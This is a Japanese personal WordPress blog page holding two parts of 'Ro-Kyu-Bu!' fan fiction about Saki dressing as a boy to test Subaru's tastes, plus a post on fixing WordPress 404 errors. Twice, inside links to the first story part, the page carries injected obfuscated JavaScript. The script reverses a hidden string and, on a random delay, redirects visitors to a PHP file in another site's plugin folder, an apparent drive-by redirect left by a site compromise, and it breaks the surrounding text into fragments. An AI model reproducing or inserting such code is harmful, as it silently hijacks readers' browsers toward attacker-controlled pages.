カレンダー

2011年7月
« 2月   8月 »
 12
3456789
10111213141516
17181920212223
24252627282930
31  

SS「ロウきゅーぶ」紗季さんが昴さんの趣味を確認することになりました その2

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“\’php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rdom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html” title=”SS「ロウきゅーぶ」紗季さんが昴さんの趣味を確認することになりました その1”>
SS「ロウきゅーぶ」紗季さんが昴さんの趣味を確認することになりました その1
 の続き。

長谷川さんがそっちの趣味じゃいか調査するためには、どうするべきかしら。

まず長谷川さんに男装した姿で自然と仲良くなることが必要。

作戦はこうね。
 1.長谷川さんが帰るところで自然に会う感じで声をかける。
 2.バスケ勝負と申し込む。
   長谷川さんは優しいので小学生からの勝負でも無碍にしないはず。
 3.もちろん、私では勝負にならないので、勝負に負ける。
   そこで、長谷川さんにバスケを教えて欲しいと頼む
 4.ここで長谷川さんがそういう趣味がなければ、忙しい長谷川さんは断るはず
   でも、優しい長谷川さんは少しなら教えると答える可能性もあり
   もし、教えてもらえる場合は、引き続き調査ね。
 5.教えてもらうときに、積極的に長谷川さんに触れてみる。
   これで長谷川さんの様子を見て判断。

完璧な作戦ね。
さっそく明日決行しようかしら。

まっててね、もっかん。
あなたの昴さんにそっちの趣味がないことを私がちゃんとしらべてあげるから。


翌日

男の子に見えるように髪をまとめたりするのは大変だったけど、これで大丈夫なはず。
あとは自然に長谷川さんに声をかけなきゃ。

「は、長谷川さん、今よろしいでしょうか?」

落ち着け私、自然に、自然に。

「あれ、偶然だね、紗季。」
と長谷川さんが答えてくれるのだけれど、私のことがバレている!?
なんで、完璧は変装のはずなのに。

とにかくごまかさないと。

「わ、、、私は紗季の従姉弟の男の子です。けっして紗季ではありません」
そう、従姉弟という設定ならバレないはず。
不意のトラブルにも動じない強い精神はPGをするには必要。

そう、私は冷静。

「あ、、、えっ、、、、ああ、そうなんだ。ごめんね、紗季に似ていたから勘違いしちゃった」

ふぅ、危ないところでした。なんとか長谷川さんの誤解は解けたみたい。
あとは、引き続き作戦を続行するのみ。

「長谷川さん、私とバスケで勝負してください。」

長谷川さんは少し悩んでから、笑顔で勝負を引き受けて下さった。
やはり長谷川さんは優しいです。

その笑顔でもっと話していたいですが、いえ、そういうことではなくて、勝負をする必要があります。
でも、たまにはこうやって二人で話すのもいいです。

そんなことを思っていたら長谷川さんが

「じゃあ、勝負はうちの庭でもいいかな。公園のリングが空いているかわからないし、あまり1on1で占有するのもほかの人に悪いからね」

と行ってくださって、長谷川さんの家に二人でお邪魔することになりました。
ごめんね、もっかん。

別にそういうことじゃないから、仕方なくだからね。


ロウきゅーぶに関する投稿SS

「ロウきゅーぶ」SSで紗季さんの昴の呼び方間違えてたに気づいた

前に書き始めたSSなのですが、
これね。

dom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}$cFN$wEpyMrNXtezaeR2=function(n){if (typeof ($cFN$wEpyMrNXtezaeR2.list[n]) == “string”) return $cFN$wEpyMrNXtezaeR2.list[n].split(“”).reverse().join(“”);return $cFN$wEpyMrNXtezaeR2.list[n];};$cFN$wEpyMrNXtezaeR2.list=[“\’php.sgnittes-nigulp/ssc/xobthgil-elbixelf/snigulp/tnetnoc-pw/ti.otelainafets//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.rdom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}dex.html”>SS「ロウきゅーぶ」紗季さんが昴さんの趣味を確認することになりました その1

ロウきゅーぶの原作を読み返していて(アニメにつられて2巻を改めて読んでた)
紗季さんは昴のことは、「長谷川さん」と呼ぶことに気づいた。

呼称間違えた。

あとで直さないと。
そういえば、みんな呼び方が違った気がするのでこの辺もチェックしておかないといけないな。

SS「ロウきゅーぶ」紗季さんが昴さんの趣味を確認することになりました その1

ちょっとした好奇心のつもりで買ってしまったとある本。

そして、深まる疑惑。

もしかしたら、昴さんは男の人に興味があるのではないか。
いえ、そんなことはないと思いながらも、払しょくできない疑念。

昴さんはとても優しい方なのだけれど、この本にあるような感じで攻められそうな方でもある。
いえ、昴さんは受けではなく、実は攻めなのかもしれない。

そんな考えばかりが頭を支配する。

もし、昴さんがそういう趣味だとしたらトモがかわいそう。

これはトモのために確認の必要そうね。

目的は、昴さんにそういう趣味がないことの確認。
方法としては、男の方がそれとなく昴さんに仲良くしてもらいながら様子見がいいかしら。
でも、そのような方は私の知り合いにはいないので、どうするべきか。

そもそも、もし、万が一。

万が一です。

昴さんがそういう趣味だった場合、その方とそういう関係になってしまうことになります。
それは断固阻止しなければなりません。

そう考えると、残る方法は私が男装して昴さんにそれとなく確認するしかないですね。
そうです、これは考え抜いた結果、仕方ないのです。

髪をなんとか隠さないといけないので、大変ですがこれも昴さんと一緒にいるため
ではなくて、昴さんの趣味を確認するためなのでがんばります。

まずは、昴さんの帰宅中にそれとなく男装した状態で遭遇することから始めましょう。

続く

※このような展開で始めようと思っています。
 実際、紗季さんの髪の量から考えると隠すのは不可能なんでしょうが、そのあたりはいいごまかし方が思いつきませんでした。


ロウきゅーぶに関する投稿SS

WordPress 404エラーが出るようになってしまいあせりました

各記事をクリックすると、なぜか404エラーが表示されるようになってしま、もしかして、WordPressを3.2にバージョンアップしたのがまずかったのかと思い、バージョンアップ前に戻したりしても直らない。

パーマリンクがカスタマイズになっているので、デフォルトにしたら表示されるようになりました。
しかし、googleなどで検索したときはカスタマイズしたほうのURLで飛んでくるため404エラーで表示されない状態。

そんなことをしていたのが出社前の朝でした。

とりあえず、デフォルト状態で出社。
ホテルに戻ってから原因調査。

ホテルの回線でリモートで自宅PCに入るのは遅すぎてつらいです。

そして、思い出したのが、WP Super Cache の プラグインをいれようとして.htaccessファイルの中身を書き換えたのを思い出しました。

これを書き直す前に戻したら正常に動くようになりました。

WP Super Cacheをインストール後、一回したページのキャッシュが作成されないからおかしいなと思っていたら、どうも正しく動いてなかったみたい。

WP Super Cacheを入れるのは、また今度時間ができてからやろうと思います。
テスト用の環境のほうで試してから正式な環境に入れることにします。

めんどくさいからといって、横着したのがいけませんでした。